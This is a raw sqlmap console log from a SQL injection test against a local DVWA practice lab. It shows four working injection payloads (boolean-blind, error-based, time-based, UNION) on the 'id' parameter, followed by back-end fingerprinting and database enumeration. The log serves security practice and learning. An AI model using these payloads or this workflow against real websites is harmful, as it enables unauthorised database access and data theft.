        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:54:09 /2025-10-18/

[01:54:09] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
do you want to check for the existence of site's sitemap(.xml) [y/N] N
[01:54:09] [INFO] starting crawler for target URL 'http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit'
[01:54:09] [INFO] searching for links with depth 1
[01:54:09] [INFO] starting 2 threads
[01:54:09] [CRITICAL] WAF/IPS identified as 'Approach'
do you want to normalize crawling results [Y/n] Y
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[01:54:10] [INFO] found a total of 2 targets
[1/2] URL:
GET http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit
do you want to test this URL? [Y/n/q]
> Y
[01:54:10] [INFO] testing URL 'http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit'
[01:54:10] [INFO] resuming back-end DBMS 'mysql' 
[01:54:10] [INFO] using '/root/.local/share/sqlmap/output/results-10182025_0154am.csv' as the CSV results file in multiple targets mode
[01:54:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=1' OR NOT 1058=1058-- sdeZ&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5948 FROM(SELECT COUNT(*),CONCAT(0x716b6b7171,(SELECT (ELT(5948=5948,1))),0x717a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyAH&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2163 FROM (SELECT(SLEEP(5)))vcYP)-- DIPA&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716b6b7171,0x7276725042676c61476d4f45714371586a74765968795070666f65624b6a434965644f487a435852,0x717a7a6271)-- -&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n] Y
[01:54:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL 5 (MariaDB fork)
[01:54:10] [INFO] fetching database names
available databases [2]:
[*] dvwa
[*] information_schema

SQL injection vulnerability has already been detected against '127.0.0.1'. Do you want to skip further tests involving it? [Y/n] Y
[01:54:10] [INFO] skipping 'http://127.0.0.1:8080/vulnerabilities/fi/?page=include.php'
[01:54:10] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-10182025_0154am.csv'
[01:54:10] [WARNING] your sqlmap version is outdated

[*] ending @ 01:54:10 /2025-10-18/

